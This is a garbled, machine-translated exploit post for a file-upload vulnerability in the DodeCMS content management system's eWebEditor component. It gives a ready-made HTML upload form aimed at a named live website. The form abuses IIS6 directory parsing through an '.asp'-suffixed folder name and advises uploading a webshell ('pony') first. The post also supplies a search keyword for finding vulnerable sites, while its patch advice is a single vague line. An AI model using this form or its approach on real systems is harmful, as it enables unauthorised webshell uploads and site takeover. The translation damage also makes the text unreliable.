DodeCMS becomes 0-day website content management system Upload Vulnerability and fixes

Program description:
DodeCMS was developed by Liaoning chengchuang Network Technology Co., Ltd. based on Microsoft ASP and general ACCESS database;
The access mode adopts the dynamic mode, which basically realizes the custom functions of the system. The code is concise and efficient, easy to modify and maintain, and highly scalable.

Default background path: admin/
Admin
Official Website:Http://www.dodecms.com/

Prerequisites: IIS6.0 + asp environment

Vulnerability file: the admin/eWebEditor/asp/upload. asp code is omitted, and the cause is omitted. (Want To Know About Baidu)

Code:
<Form action ="Http://www.0855. TV /admin/eWebEditor/asp/upload.asp? Action = save & type = image & style = popup & cusdir = Mr. DzY. asp"Method = post name = myform enctype =" multipart/form-data ">
<Input type = file name = previusfile size = 100> <br>
<Input type = submit value = upload>
</Form>
If the image has a real image (we recommend that you upload the pony first ):

The resolution fails because the local test is not installed with IIS6.0.

Test:
Powered by DodeCMS

Search for keywords by yourself. Tianchao decree does not permit. Take a long time.

Patch:
Add verification change path \ or delete directly.